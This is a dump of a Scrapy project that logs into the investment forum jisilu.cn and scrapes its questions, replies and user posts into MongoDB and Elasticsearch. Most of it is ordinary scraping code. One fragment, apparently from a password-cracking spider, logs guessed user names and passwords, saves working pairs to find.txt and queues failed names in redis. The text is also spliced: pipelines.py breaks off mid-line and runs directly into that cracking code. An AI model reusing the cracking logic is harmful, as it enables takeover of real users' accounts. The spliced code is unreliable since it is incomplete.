each remote server 87 | #AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0 88 | # Enable showing throttling stats for every response received: 89 | #AUTOTHROTTLE_DEBUG = False 90 | 91 | # Enable and configure HTTP caching (disabled by default) 92 | # See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings 93 | #HTTPCACHE_ENABLED = True 94 | #HTTPCACHE_EXPIRATION_SECS = 0 95 | #HTTPCACHE_DIR = 'httpcache' 96 | #HTTPCACHE_IGNORE_HTTP_CODES = [] 97 | #HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage' 98 | 99 | ELASTICSEARCH_SERVERS = ['10.18.6.102:9200'] 100 | ELASTICSEARCH_INDEX='jsl_elastic' 101 | ELASTICSEARCH_TYPE='ticket' 102 | -------------------------------------------------------------------------------- /jsl/pipelines.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Define your item pipelines here 4 | # 5 | # Don't forget to add your pipeline to the ITEM_PIPELINES setting 6 | # See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html 7 | import datetime 8 | import logging 9 | 10 | import pymongo 11 | from collections import OrderedDict 12 | from scrapy.exporters import JsonLinesItemExporter 13 | from jsl.items import Relationship, JslItem 14 | from jsl import config 15 | 16 | 17 | class JslPipeline(object): 18 | 19 | def __init__(self): 20 | connect_uri = f'mongodb://{config.user}:{config.password}@{config.mongodb_host}:{config.mongodb_port}' 21 | self.db = pymongo.MongoClient(connect_uri) 22 | # self.user = u'neo牛3' # 修改为指定的用户名 如 毛之川 ,然后找到用户的id,在用户也的源码哪里可以找到 比如持有封基是8132 23 | # self.collection = self.db['db_parker']['jsl_20181108_allQuestion_test'] 24 | self.collection = self.db['db_parker'][config.doc_name] 25 | self.relations = self.db['db_parker']['jsl_relationship'] 26 | try: 27 | self.collection.ensure_index('question_id', unique=True) 28 | except Exception as e: 29 | pass 30 | 31 | def process_item(self, item, spider): 32 | 33 | if isinstance(item, JslItem): 34 | update_time = datetime.datetime.now() 35 | item = dict(item) 36 | item['update_time'] = update_time 37 | 38 | 39 | if self.collection.find_one({'question_id': item['question_id']},{'_id':1}): 40 | # 更新评论部分, 不更新就退出 41 | only_add = False 42 | 43 | try: 44 | only_add = item['only_add'] 45 | 46 | except Exception as e: 47 | pass 48 | 49 | if not only_add: 50 | resp_no = self.collection.find_one({'question_id': item['question_id']},{'resp_no':1}) 51 | resp_no_num = resp_no.get('resp_no') 52 | 53 | if resp_no_num', user) 149 | logger.info('password==>', password) 150 | with open('find.txt','a') as f: 151 | f.write(f'{user}:{password}') 152 | if js_data.get('err','')=='用户名或口令无效': 153 | print('无效,入redis') 154 | self.__redis.sadd('username_run',user) 155 | 156 | if __name__ == '__main__': 157 | spider = CrackSpider() 158 | spider.run() 159 | -------------------------------------------------------------------------------- /jsl/spiders/questions_loop.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import re 3 | import scrapy 4 | from scrapy import Request, FormRequest 5 | from jsl.items import JslItem 6 | from jsl import config 7 | import logging 8 | 9 | LASTEST_ID = config.LASTEST_ID # 394716 10 | 11 | 12 | # 遍历所有questions id 看从哪里开始 13 | class AllcontentSpider(scrapy.Spider): 14 | name = 'questions_loop' 15 | 16 | headers = { 17 | 'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache', 18 | 
'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01', 19 | 'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest', 20 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36', 21 | 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8', 22 | 'Referer': 'https://www.jisilu.cn/login/', 23 | 'Accept-Encoding': 'gzip,deflate,br', 24 | 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8' 25 | } 26 | 27 | def start_requests(self): 28 | login_url = 'https://www.jisilu.cn/login/' 29 | headers = { 30 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 31 | 'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8', 32 | 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 33 | 'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/', 34 | 'Upgrade-Insecure-Requests': '1', 35 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'} 36 | 37 | yield Request(url=login_url, headers=headers, callback=self.login, dont_filter=True) 38 | 39 | def login(self, response): 40 | url = 'https://www.jisilu.cn/account/ajax/login_process/' 41 | data = { 42 | 'return_url': 'https://www.jisilu.cn/', 43 | 'user_name': config.jsl_user, 44 | 'password': config.jsl_password, 45 | 'net_auto_login': '1', 46 | '_post_type': 'ajax', 47 | } 48 | 49 | yield FormRequest( 50 | url=url, 51 | headers=self.headers, 52 | formdata=data, 53 | callback=self.parse_, 54 | ) 55 | 56 | def parse_(self, response): 57 | print(response.text) 58 | start_page = LASTEST_ID 59 | 60 | focus_url = 'https://www.jisilu.cn/question/{}'.format(start_page) 61 | yield Request(url=focus_url, headers=self.headers, callback=self.parse_item, meta={'question_id': start_page, 'dont_redirect': True,}, 62 | dont_filter=True) 63 | 64 | def parse_item(self, response): 65 | question_id_ = response.meta['question_id'] 66 | 67 | if '问题不存在或已被删除' in response.text: 68 | question_id = question_id_ - 1 69 | if question_id>1: 70 | focus_url = 'https://www.jisilu.cn/question/{}'.format(question_id) 71 | 72 | yield Request(url=focus_url, headers=self.headers, callback=self.parse_item, 73 | meta={'question_id': question_id, 'dont_redirect': True,}, dont_filter=True) 74 | 75 | else: 76 | 77 | question_id = question_id_ - 1 78 | print(question_id) 79 | if question_id > 1: 80 | focus_url = 'https://www.jisilu.cn/question/{}'.format(question_id) 81 | 82 | yield Request(url=focus_url, headers=self.headers, callback=self.parse_item, 83 | meta={'question_id': question_id, 'dont_redirect': True,}, dont_filter=True) 84 | 85 | 86 | item = JslItem() 87 | 88 | title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first() 89 | s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first() 90 | 91 | if s: 92 | ret = re.findall('(.*?)\.donate_user_avatar', s, re.S) 93 | else: 94 | ret = None 95 | 96 | try: 97 | content = ret[0].strip() 98 | except: 99 | content = None 100 | 101 | createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first() 102 | 103 | resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+') 104 | 105 | url = response.url 106 | 107 | # 添加发起人 108 | try: 109 | item['creator'] = 
response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first() 110 | except Exception as e: 111 | print(e) 112 | item['creator'] = None 113 | try: 114 | item['title'] = title.strip() 115 | except Exception as e: 116 | item['title']=None 117 | item['content'] = content 118 | 119 | if resp_no is None: 120 | resp_no = 0 121 | # try: 122 | # item['resp_no'] = int(resp_no) 123 | # except Exception as e: 124 | # logging.warning(e) 125 | # logging.warning('没有回复') 126 | # item['resp_no'] = None 127 | item['only_add'] = True 128 | item['resp_no'] = int(resp_no) 129 | item['question_id'] = question_id_ 130 | createTime = createTime.strip() 131 | if not re.search('^\d', createTime): 132 | createTime = createTime.replace('发表时间 ', '') 133 | # createTime = None 134 | # self.logger.error('创建日期有误:{}'.format(url)) 135 | if not re.match('\d{4}-\d{2}-\d{2} \d{2}:\d{2}', createTime): 136 | self.logger.error('创建日期有误:{}'.format(url)) 137 | self.logger.error(createTime) 138 | createTime = None 139 | # 140 | item['createTime'] = createTime 141 | item['url'] = url.strip() 142 | resp = [] 143 | last_resp_date = None 144 | for index, reply in enumerate( 145 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')): 146 | replay_user = reply.xpath('.//div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first() 147 | 148 | if last_resp_date is None: 149 | last_resp_date = reply.xpath('.//div[@class="aw-dynamic-topic-meta"]/span/text()').extract_first() 150 | 151 | rep_content = reply.xpath( 152 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]/text()').extract_first() 153 | # print rep_content 154 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first() 155 | try: 156 | int(agree) 157 | except: 158 | agree = 0 159 | 160 | resp.append({replay_user.strip() + '_{}'.format(index): [int(agree), rep_content.strip()]}) 161 | 162 | item['resp'] = resp 163 | item['last_resp_date'] = last_resp_date 164 | 165 | yield item 166 | 167 | -------------------------------------------------------------------------------- /jsl/spiders/jisilu_user_content.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import datetime 3 | import logging 4 | import re 5 | import scrapy 6 | from jsl.items import JslItem 7 | from jsl import config 8 | from jsl.spiders.aes_encode import decoder 9 | from scrapy import Request,FormRequest 10 | # 获取某个用户的所有帖子,主要为了慎防大v要删帖,快速下载 11 | 12 | class JisiluSpider(scrapy.Spider): 13 | name = 'single_user' 14 | DETAIL_URL = 'https://www.jisilu.cn/question/{}&sort_key=agree_count&sort=DESC' 15 | MULTI_PAGE_DETAIL = 'https://www.jisilu.cn/question/id-{}__sort_key-__sort-DESC__uid-__page-{}' 16 | 17 | def __init__(self): 18 | super(JisiluSpider,self).__init__() 19 | 20 | self.headers = { 21 | 'Accept-Language': ' zh-CN,zh;q=0.9', 'Accept-Encoding': ' gzip, deflate, br', 22 | 'X-Requested-With': ' XMLHttpRequest', 'Host': ' www.jisilu.cn', 'Accept': ' */*', 23 | 'User-Agent': ' Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36', 24 | 'Connection': ' keep-alive', 25 | 'Pragma': ' no-cache', 'Cache-Control': ' no-cache', 26 | 'Referer': ' https://www.jisilu.cn/people/dbwolf' 27 | } 28 | 29 | # self.uid = '83220' # 这个id需要在源码页面里面去找 30 | self.uid = config.uid 31 | 32 | self.list_url = 
'https://www.jisilu.cn/people/ajax/user_actions/uid-{}__actions-101__page-{}' 33 | 34 | 35 | def start_requests(self): 36 | 37 | login_url = 'https://www.jisilu.cn/login/' 38 | headersx = { 39 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 40 | 'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8', 41 | 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 42 | 'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/', 43 | 'Upgrade-Insecure-Requests': '1', 44 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'} 45 | 46 | yield Request(url=login_url, headers=headersx, callback=self.login, dont_filter=True) 47 | 48 | def login(self, response): 49 | url = 'https://www.jisilu.cn/account/ajax/login_process/' 50 | username = decoder(config.jsl_user) 51 | jsl_password = decoder(config.jsl_password) 52 | data = { 53 | 'return_url': 'https://www.jisilu.cn/', 54 | 'user_name': username, 55 | 'password': jsl_password, 56 | 'net_auto_login': '1', 57 | '_post_type': 'ajax', 58 | } 59 | 60 | yield FormRequest( 61 | url=url, 62 | headers=self.headers, 63 | formdata=data, 64 | callback=self.start_fetch_user, 65 | dont_filter=True, 66 | 67 | ) 68 | 69 | 70 | def start_fetch_user(self,response): 71 | current_page=0 72 | yield scrapy.Request(self.list_url.format(self.uid,current_page),headers=self.headers,meta={'current_page':current_page},callback=self.parse) 73 | 74 | def parse(self, response,**kwargs): 75 | current_page = response.meta['current_page'] 76 | link_list = response.xpath('//body/div[@class="aw-item"]') 77 | if link_list is None: 78 | return 79 | 80 | for link in link_list: 81 | link_=link.xpath('.//div[@class="aw-mod"]/div[@class="aw-mod-head"]/h4/a/@href').extract_first() 82 | match = re.search('/question/(\d+)',link_) 83 | if match: 84 | question_id = match.group(1) 85 | yield scrapy.Request(self.DETAIL_URL.format(question_id), 86 | headers=self.headers, 87 | callback=self.parse_item, 88 | meta={'question_id':question_id}) 89 | 90 | current_page=current_page+1 91 | yield scrapy.Request(self.list_url.format(self.uid,current_page),headers=self.headers,meta={'current_page':current_page},callback=self.parse) 92 | 93 | 94 | def check_detail(self,response,**kwargs): 95 | 96 | if '您访问的资源需要购买会员' in response.text: 97 | return 98 | 99 | question_id = response.meta['question_id'] 100 | more_page = response.xpath('//div[@class="pagination pull-right"]') 101 | 102 | item = JslItem() 103 | title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first() 104 | s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first() 105 | ret = re.findall('(.*?)\.donate_user_avatar', s, re.S) 106 | item['question_id'] = question_id 107 | 108 | try: 109 | content = ret[0].strip() 110 | except Exception as e: 111 | logging.error(e) 112 | content = None 113 | 114 | createTime = response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first() 115 | # 'aw-question-detail-meta' 116 | resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+') 117 | 118 | url = response.url 119 | 120 | # 添加发起人 121 | try: 122 | item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first() 123 | except Exception as e: 124 | logging.error(e) 125 | item['creator'] = None 126 | 127 | item['title'] = 
title.strip() 128 | item['content'] = content 129 | try: 130 | item['resp_no'] = int(resp_no) 131 | except Exception as e: 132 | # logging.warning('没有回复') 133 | item['resp_no'] = 0 134 | 135 | item['createTime'] = createTime.replace('发表时间 ', '') 136 | item['crawlTime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') 137 | item['url'] = url.strip() 138 | # item['html'] = response.text 139 | # item['last_resp_date'] = response.meta['last_resp_date'] 140 | 141 | # 多页 142 | if more_page: 143 | 144 | total_resp_no = item['resp_no'] 145 | total_page = total_resp_no // 100 + 1 146 | item['resp'] = [] 147 | 148 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, 1), headers=self.headers, 149 | callback=self.multi_page_detail, 150 | meta={'question_id': question_id, 'page': 1, 'total_page': total_page, 151 | 'item': item}) 152 | 153 | else: 154 | 155 | resp_ = [] 156 | # 回复内容 157 | resp_time_list = [] 158 | for index, reply in enumerate( 159 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')): 160 | replay_user = reply.xpath( 161 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first() 162 | rep_content = reply.xpath( 163 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath( 164 | 'string(.)').extract_first() 165 | 166 | # 注意这里为了从用户初采集,加了这个字段 167 | rep_time = reply.xpath('.//div[@class="pull-left aw-dynamic-topic-content"]//div[@class="aw-dynamic-topic-meta"]/span/text()').extract_first() 168 | resp_time_list.append(rep_time) 169 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first() 170 | if agree is None: 171 | agree = 0 172 | else: 173 | agree = int(agree) 174 | 175 | resp_.append( 176 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}}) 177 | if len(resp_time_list)>0: 178 | resp_time = resp_time_list[0] 179 | else: 180 | resp_time=None 181 | item['resp'] = resp_ 182 | item['last_resp_date']=resp_time 183 | 184 | yield item 185 | 186 | # 详情页 187 | def multi_page_detail(self, response): 188 | 189 | current_page = response.meta['page'] 190 | item = response.meta['item'] 191 | total_page = response.meta['total_page'] 192 | question_id = response.meta['question_id'] 193 | 194 | resp_len = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]/div') 195 | 196 | for index, reply in enumerate( 197 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')): 198 | replay_user = reply.xpath( 199 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first() 200 | rep_content = reply.xpath( 201 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath( 202 | 'string(.)').extract_first() 203 | if rep_content: 204 | rep_content = rep_content.strip() 205 | # rep_content = '\n'.join(rep_content) 206 | 207 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first() 208 | if agree is None: 209 | agree = 0 210 | else: 211 | agree = int(agree) 212 | 213 | item['resp'].append( 214 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}}) 215 | 216 | current_page += 1 217 | 218 | if current_page <= total_page: 219 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, current_page), headers=self.headers, 220 | callback=self.multi_page_detail, 221 | meta={'question_id': question_id, 'page': current_page, 'total_page': total_page, 
222 | 'item': item}) 223 | else: 224 | yield item -------------------------------------------------------------------------------- /jsl/spiders/weekly_content.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import datetime 3 | import re 4 | import scrapy 5 | from scrapy import Request, FormRequest 6 | from jsl.items import JslItem 7 | from jsl import config 8 | import logging 9 | from jsl.spiders.aes_encode import decoder 10 | import pymongo 11 | 12 | # 按照日期爬取, 会损失新人贴 13 | 14 | class WeekContentSpider(scrapy.Spider): 15 | name = 'week_content' 16 | 17 | headers = { 18 | 'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache', 19 | 'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01', 20 | 'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest', 21 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36', 22 | 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8', 23 | 'Referer': 'https://www.jisilu.cn/login/', 24 | 'Accept-Encoding': 'gzip,deflate,br', 25 | 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8' 26 | } 27 | 28 | start_page = 1 29 | 30 | POST_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-add_time__category-__day-0__is_recommend-__page-{}' # 发帖日期 31 | RESP_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-new__category-__day-0__is_recommend-__page-{}' # 回帖按照日期 32 | DETAIL_URL = 'https://www.jisilu.cn/question/{}&sort_key=agree_count&sort=DESC' 33 | MULTI_PAGE_DETAIL = 'https://www.jisilu.cn/question/id-{}__sort_key-__sort-DESC__uid-__page-{}' 34 | 35 | def __init__(self, daily='yes', *args, **kwargs): 36 | super().__init__(*args, **kwargs) 37 | 38 | if daily == 'yes': 39 | 40 | self.logger.info('按照周') 41 | self.DAYS = 14 # 获取2年的帖子 42 | self.URL = self.POST_DATE_URL 43 | 44 | self.last_week = datetime.datetime.now() + datetime.timedelta(days=-1 * self.DAYS) 45 | 46 | 47 | connect_uri = f'mongodb://{config.user}:{config.password}@{config.mongodb_host}:{config.mongodb_port}' 48 | self.db = pymongo.MongoClient(connect_uri) 49 | # self.user = u'neo牛3' # 修改为指定的用户名 如 毛之川 ,然后找到用户的id,在用户也的源码哪里可以找到 比如持有封基是8132 50 | self.collection = self.db['db_parker'][config.doc_name] 51 | 52 | def start_requests(self): 53 | 54 | login_url = 'https://www.jisilu.cn/login/' 55 | headersx = { 56 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 57 | 'Accept-Encoding': 'gzip,deflate,br', 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8', 58 | 'Cache-Control': 'no-cache', 'Connection': 'keep-alive', 59 | 'Host': 'www.jisilu.cn', 'Pragma': 'no-cache', 'Referer': 'https://www.jisilu.cn/', 60 | 'Upgrade-Insecure-Requests': '1', 61 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36'} 62 | 63 | yield Request(url=login_url, headers=headersx, callback=self.login, dont_filter=True) 64 | 65 | def login(self, response): 66 | url = 'https://www.jisilu.cn/account/ajax/login_process/' 67 | username = decoder(config.jsl_user) 68 | jsl_password = decoder(config.jsl_password) 69 | data = { 70 | 'return_url': 'https://www.jisilu.cn/', 71 | 'user_name': username, 72 | 'password': jsl_password, 73 | 'net_auto_login': '1', 74 | '_post_type': 'ajax', 75 | } 76 | 77 | yield FormRequest( 78 | url=url, 79 | headers=self.headers, 80 | formdata=data, 81 | callback=self.parse, 82 | dont_filter=True 83 | ) 84 | 
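    # Note: login_process/ responds with JSON. Elsewhere in this repo
    # (jsl/spiders/crack_password.py) a successful login is detected via
    # errno == 0, so parse() below could verify the login before crawling on.
    # A hedged sketch of that check:
    #
    #     import json
    #     js = json.loads(response.text)
    #     if js.get('errno') != 0:
    #         self.logger.error('login failed: {}'.format(js.get('err')))
    #         return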
85 | def parse(self, response, **kwargs): 86 | print('登录后', response.text) 87 | focus_url = self.URL.format(self.start_page) 88 | 89 | yield Request(url=focus_url, headers=self.headers, callback=self.parse_page, dont_filter=True, 90 | meta={'page': self.start_page}) 91 | 92 | def parse_page(self, response): 93 | 94 | current_page = response.meta['page'] 95 | 96 | nodes = response.xpath('//div[@class="aw-question-list"]/div') 97 | last_resp_date = None 98 | 99 | for node in nodes: 100 | 101 | each_url = node.xpath('.//h4/a/@href').extract_first() 102 | try: 103 | last_resp_date = node.xpath('.//div[@class="aw-questoin-content"]/span/text()').extract()[-1].strip() 104 | # '回复 • 2018-12-10 09:49 • 46335 次浏览' 105 | last_resp_date = re.search('• (.*?) •', last_resp_date).group(1) 106 | except: 107 | logging.error('failed to find date') 108 | continue 109 | else: 110 | # 访问详情 111 | # 替换成这个 'https://www.jisilu.cn/question/320215&sort_key=agree_count&sort=DESC' 112 | # '"https://www.jisilu.cn/question/336326"' 113 | if re.search('www.jisilu.cn/question/\d+', each_url): 114 | question_id = re.search('www\.jisilu\.cn/question/(\d+)', each_url).group(1) 115 | 116 | # if self.question_exist(question_id): 117 | # continue 118 | 119 | # print(f'{question_id}帖子不存在,下载') 120 | 121 | last_resp_date = datetime.datetime.strptime(last_resp_date, '%Y-%m-%d %H:%M') 122 | yield Request(url=self.DETAIL_URL.format(question_id), headers=self.headers, 123 | callback=self.check_detail, 124 | meta={'last_resp_date': last_resp_date, 'question_id': question_id}) 125 | 126 | # 继续翻页 127 | # print(last_resp_date) 128 | if last_resp_date is not None and isinstance(last_resp_date,str): 129 | last_resp_date = datetime.datetime.strptime(last_resp_date, '%Y-%m-%d %H:%M') 130 | 131 | if last_resp_date is not None and (self.last_week < last_resp_date): 132 | # logging.info('last_resp_date ===== {}'.format(last_resp_date)) 133 | 134 | current_page += 1 135 | yield Request(url=self.URL.format(current_page), headers=self.headers, callback=self.parse_page, 136 | meta={'page': current_page}) 137 | 138 | def question_exist(self,_id): 139 | return True if self.collection.find_one({'question_id':_id},{'_id':1}) else False 140 | 141 | def compose_content(self,content_list): 142 | string = "" 143 | for line in content_list: 144 | line = line.strip() 145 | if len(line)>0: 146 | string+=line+'\n' 147 | return string 148 | 149 | def check_detail(self, response): 150 | 151 | if '您访问的资源需要购买会员' in response.text: 152 | return 153 | 154 | question_id = response.meta['question_id'] 155 | last_resp_date=response.meta['last_resp_date'] 156 | more_page = response.xpath('//div[@class="pagination pull-right"]') 157 | 158 | item = JslItem() 159 | item['last_resp_date'] = last_resp_date 160 | 161 | title = response.xpath('//div[@class="aw-mod-head"]/h1/text()').extract_first() 162 | item['question_id'] = question_id 163 | content_node = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]') 164 | 165 | content_html = content_node.extract_first() # 获取到源码 166 | 167 | # s = response.xpath('//div[@class="aw-question-detail-txt markitup-box"]').xpath('string(.)').extract_first() 168 | # ret = re.findall('(.*?)\.donate_user_avatar', s, re.S) 169 | # try: 170 | # content = ret[0].strip() 171 | # except Exception as e: 172 | # # logging.error(e) 173 | # content = None 174 | 175 | content_list = content_node.xpath('string(.)').extract() 176 | content_str = self.compose_content(content_list) 177 | 178 | createTime = 
response.xpath('//div[@class="aw-question-detail-meta"]/div/span/text()').extract_first() 179 | # 'aw-question-detail-meta' 180 | resp_no = response.xpath('//div[@class="aw-mod aw-question-detail-box"]//ul/h2/text()').re_first('\d+') 181 | 182 | url = response.url 183 | 184 | # 添加发起人 185 | try: 186 | item['creator'] = response.xpath('//div[@class="aw-side-bar-mod-body"]/dl/dd/a/text()').extract_first() 187 | except Exception as e: 188 | # logging.error(e) 189 | item['creator'] = None 190 | 191 | item['title'] = title.strip() 192 | item['content'] = content_str 193 | item['content_html'] = content_html 194 | 195 | try: 196 | item['resp_no'] = int(resp_no) 197 | except Exception as e: 198 | # logging.warning('没有回复') 199 | item['resp_no'] = 0 200 | if createTime is None: 201 | # print(title) 202 | # print(content) 203 | return 204 | item['createTime'] = createTime.replace('发表时间 ', '') 205 | item['crawlTime'] = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') 206 | item['url'] = url.strip().replace('&sort_key=agree_count&sort=DESC','') 207 | 208 | # 多页 209 | if more_page: 210 | 211 | total_resp_no = item['resp_no'] 212 | total_page = total_resp_no // 100 + 1 213 | item['resp'] = [] 214 | 215 | yield Request(url=self.MULTI_PAGE_DETAIL.format(question_id, 1), headers=self.headers, 216 | callback=self.multi_page_detail, 217 | meta={'question_id': question_id, 'page': 1, 'total_page': total_page, 218 | 'item': item}) 219 | 220 | else: 221 | 222 | resp_ = [] 223 | # 回复内容 224 | for index, reply in enumerate( 225 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')): 226 | replay_user = reply.xpath( 227 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first() 228 | rep_content = reply.xpath( 229 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath( 230 | 'string(.)').extract_first() 231 | # rep_content = '\n'.join(rep_content) 232 | 233 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first() 234 | if agree is None: 235 | agree = 0 236 | else: 237 | agree = int(agree) 238 | 239 | resp_.append( 240 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}}) 241 | 242 | item['resp'] = resp_ 243 | yield item 244 | 245 | # 详情页 246 | def multi_page_detail(self, response): 247 | 248 | current_page = response.meta['page'] 249 | item = response.meta['item'] 250 | total_page = response.meta['total_page'] 251 | question_id = response.meta['question_id'] 252 | 253 | resp_len = response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]/div') 254 | 255 | for index, reply in enumerate( 256 | response.xpath('//div[@class="aw-mod-body aw-dynamic-topic"]/div[@class="aw-item"]')): 257 | replay_user = reply.xpath( 258 | './/div[@class="pull-left aw-dynamic-topic-content"]//p/a/text()').extract_first() 259 | rep_content = reply.xpath( 260 | './/div[@class="pull-left aw-dynamic-topic-content"]//div[@class="markitup-box"]')[0].xpath( 261 | 'string(.)').extract_first() 262 | if rep_content: 263 | rep_content = rep_content.strip() 264 | 265 | agree = reply.xpath('.//em[@class="aw-border-radius-5 aw-vote-count pull-left"]/text()').extract_first() 266 | if agree is None: 267 | agree = 0 268 | else: 269 | agree = int(agree) 270 | 271 | item['resp'].append( 272 | {replay_user.strip(): {'agree': agree, 'resp_content': rep_content.strip()}}) 273 | 274 | current_page += 1 275 | 276 | if current_page <= total_page: 277 | yield 
Request(url=self.MULTI_PAGE_DETAIL.format(question_id, current_page), headers=self.headers, 278 | callback=self.multi_page_detail, 279 | meta={'question_id': question_id, 'page': current_page, 'total_page': total_page, 280 | 'item': item}) 281 | else: 282 | yield item 283 | -------------------------------------------------------------------------------- /jsl/spiders/allcontent.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import datetime 3 | import re 4 | import scrapy 5 | from scrapy import Request, FormRequest 6 | from jsl.items import JslItem 7 | from jsl import config 8 | import logging 9 | from jsl.spiders.aes_encode import decoder 10 | import pymongo 11 | 12 | # 按照日期爬取, 会损失新人贴 13 | 14 | class AllcontentSpider(scrapy.Spider): 15 | name = 'allcontent' 16 | 17 | headers = { 18 | 'Host': 'www.jisilu.cn', 'Connection': 'keep-alive', 'Pragma': 'no-cache', 19 | 'Cache-Control': 'no-cache', 'Accept': 'application/json,text/javascript,*/*;q=0.01', 20 | 'Origin': 'https://www.jisilu.cn', 'X-Requested-With': 'XMLHttpRequest', 21 | 'User-Agent': 'Mozilla/5.0(WindowsNT6.1;WOW64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/67.0.3396.99Safari/537.36', 22 | 'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8', 23 | 'Referer': 'https://www.jisilu.cn/login/', 24 | 'Accept-Encoding': 'gzip,deflate,br', 25 | 'Accept-Language': 'zh,en;q=0.9,en-US;q=0.8' 26 | } 27 | 28 | start_page = 1 29 | 30 | POST_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-add_time__category-__day-0__is_recommend-__page-{}' # 发帖日期 31 | RESP_DATE_URL = 'https://www.jisilu.cn/home/explore/sort_type-new__category-__day-0__is_recommend-__page-{}' # 